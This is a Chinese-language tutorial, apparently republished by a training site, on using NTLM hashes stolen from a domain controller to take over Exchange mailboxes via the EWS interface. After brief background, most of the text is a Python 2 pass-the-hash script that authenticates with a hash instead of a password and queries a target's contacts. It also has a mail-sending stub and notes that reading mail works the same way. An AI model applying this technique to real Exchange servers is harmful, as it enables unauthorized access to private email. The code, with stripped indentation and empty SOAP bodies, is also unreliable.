本文将带你了解exchange服务器之使用NTLM HASH 接管exchange 邮件，希望本文对大家学Exchange有所帮助。

场景：在域控上抓了hash之后，过段时间后域控权限丢了，无法通过PTH直接到目标机器（比如他用的是MAC或者像我一样上层是个路由器），这种情况下想去获取目标邮件相关信息。

exchange的ews接口支持ntlm认证，所以直接使用ntlm认证就行了，这里唯一不同的是要使用ntlm hash去进行认证，这块已经有人造好轮子了https://github.com/mullender/python-ntlm，这里直接拿来使用就行了，原理是使用ntlm hash去生成挑战值。

类似的项目还有一个就是https://github.com/requests/requests-ntlm，从代码里面看这个貌似也支持pth，测试了半天之后发现是作者瞎写的注释。

实例代码（这里拿我们观星实验室落叶纷飞大牛和darkray大牛的hash测试）

#!/usr/bin/env python

# -*- coding: utf-8 -*-

# @Time    : 2018/1/2 下午8:38

# @Author  : iswin

# @File    : main.py

# @Software: PyCharm

import urllib2

from HTTPNtlmAuthHandler import HTTPNtlmAuthHandler

url = "https://mail.xxx.com/ews/exchange.asmx"

def searchContact(keywords):

SOAP = '''

           <soap:Envelope

               xmlns:xsi="//www.w3.org/2001/XMLSchema-instance"

               xmlns:xsd="//www.w3.org/2001/XMLSchema"

               xmlns:soap="//schemas.xmlsoap.org/soap/envelope/"

               xmlns:t="//schemas.microsoft.com/exchange/services/2006/types">

                   <ResolveNames

                       xmlns="//schemas.microsoft.com/exchange/services/2006/messages"

                       xmlns:t="//schemas.microsoft.com/exchange/services/2006/types" ReturnFullContactData="true">

                       {}

       '''.format(keywords)

auth_NTLM = auth()

opener = urllib2.build_opener(auth_NTLM)

urllib2.install_opener(opener)

req = urllib2.Request(url, data=SOAP)

req.add_header('Content-Type', 'text/xml')

response = urllib2.urlopen(req)

print(response.read())

def sendMail(mailto=''):

SOAP = '''

   '''

auth_NTLM = auth()

opener = urllib2.build_opener(auth_NTLM)

urllib2.install_opener(opener)

req = urllib2.Request(url, data=SOAP)

req.add_header('Content-Type', 'text/xml')

response = urllib2.urlopen(req)

print(response.read())

def auth():

# user = 'xxx\xx'

# password = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'

user = 'xxxss\sssssss'

password = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'

passman = urllib2.HTTPPasswordMgrWithDefaultRealm()

passman.add_password(None, url, user, password)

auth_NTLM = HTTPNtlmAuthHandler(passman)

return auth_NTLM

if __name__ == '__main__':

sendMail()

# searchContact('iswin')

其它操作，比如收邮件，根据关键字去获取邮件信息等，参考微软的exchange ews api即可。

本文由职坐标整理并发布，希望对同学们有所帮助。了解更多详情请关注职坐标系统运维之Exchange频道！